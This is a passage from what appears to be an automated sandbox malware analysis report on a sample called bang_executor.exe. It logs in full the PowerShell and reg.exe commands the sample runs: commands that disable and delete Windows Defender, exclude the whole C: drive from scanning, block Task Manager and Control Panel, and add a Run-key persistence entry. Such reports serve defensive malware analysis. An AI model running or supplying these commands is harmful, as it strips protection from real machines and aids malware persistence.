-Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe bang_executor.exe Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe executer.exe Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K instaling.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K mgr.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K microsoft.batJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c echo add-mppreference -exclusionpath "c:\" -erroraction silentlycontinue; add-mppreference -exclusionprocess "c:\*" -erroraction silentlycontinue; set-mppreference -disablearchivescanning 1 -erroraction silentlycontinue; set-mppreference -disablebehaviormonitoring 1 -erroraction silentlycontinue; set-mppreference -disableintrusionpreventionsystem 1 -erroraction silentlycontinue; set-mppreference -disableioavprotection 1 -erroraction silentlycontinue; set-mppreference -disableremovabledrivescanning 1 -erroraction silentlycontinue; set-mppreference -disableblockatfirstseen 1 -erroraction silentlycontinue; set-mppreference -disablescanningmappednetworkdrivesforfullscan 1 -erroraction silentlycontinue; set-mppreference -disablescanningnetworkfiles 1 -erroraction silentlycontinue; set-mppreference -disablescriptscanning 1 -erroraction silentlycontinue; set-mppreference -disablerealtimemonitoring 1 -erroraction silentlycontinue; set-mppreference -lowthreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -moderatethreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -highthreatdefaultaction allow -erroraction silentlycontinue; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnissvc" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\windefend" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\sense" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnisdrv" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdfilter" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdboot" -name start -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name spynetreporting -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name submitsamplesconsent -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\features" -name tamperprotection -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender" -name disableantispyware -value 1; set-itemproperty -path "hklm:\software\policies\microsoft\windows defender" -name disableantispyware -value 1; remove-item -recurse -force -path "c:\programdata\windows\windows defender\"; remove-item -recurse -force -path "c:\programdata\windows\windows defender advanced threat protection\"; remove-item -recurse -force -path "c:\windows\system32\drivers\wd\"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnissvc"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\windefend"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\sense"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnisdrv"; remove-item -recurse -force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c echo add-mppreference -exclusionpath "c:\" -erroraction silentlycontinue; add-mppreference -exclusionprocess "c:\*" -erroraction silentlycontinue; set-mppreference -disablearchivescanning 1 -erroraction silentlycontinue; set-mppreference -disablebehaviormonitoring 1 -erroraction silentlycontinue; set-mppreference -disableintrusionpreventionsystem 1 -erroraction silentlycontinue; set-mppreference -disableioavprotection 1 -erroraction silentlycontinue; set-mppreference -disableremovabledrivescanning 1 -erroraction silentlycontinue; set-mppreference -disableblockatfirstseen 1 -erroraction silentlycontinue; set-mppreference -disablescanningmappednetworkdrivesforfullscan 1 -erroraction silentlycontinue; set-mppreference -disablescanningnetworkfiles 1 -erroraction silentlycontinue; set-mppreference -disablescriptscanning 1 -erroraction silentlycontinue; set-mppreference -disablerealtimemonitoring 1 -erroraction silentlycontinue; set-mppreference -lowthreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -moderatethreatdefaultaction allow -erroraction silentlycontinue; set-mppreference -highthreatdefaultaction allow -erroraction silentlycontinue; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnissvc" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\windefend" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\sense" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdnisdrv" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdfilter" -name start -value 4; set-itemproperty -path "hklm:\system\currentcontrolset\services\wdboot" -name start -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name spynetreporting -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\real-time protection" -name submitsamplesconsent -value 0; set-itemproperty -path "hklm:\software\microsoft\windows defender\features" -name tamperprotection -value 4; set-itemproperty -path "hklm:\software\microsoft\windows defender" -name disableantispyware -value 1; set-itemproperty -path "hklm:\software\policies\microsoft\windows defender" -name disableantispyware -value 1; remove-item -recurse -force -path "c:\programdata\windows\windows defender\"; remove-item -recurse -force -path "c:\programdata\windows\windows defender advanced threat protection\"; remove-item -recurse -force -path "c:\windows\system32\drivers\wd\"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnissvc"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\windefend"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\sense"; remove-item -recurse -force -path "hklm:\system\currentcontrolset\services\wdnisdrv"; remove-item -recurse -force -Jump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FCEBF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_004FCEBF
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F27A9 cpuid 0_2_004F27A9
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_004FD0AB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
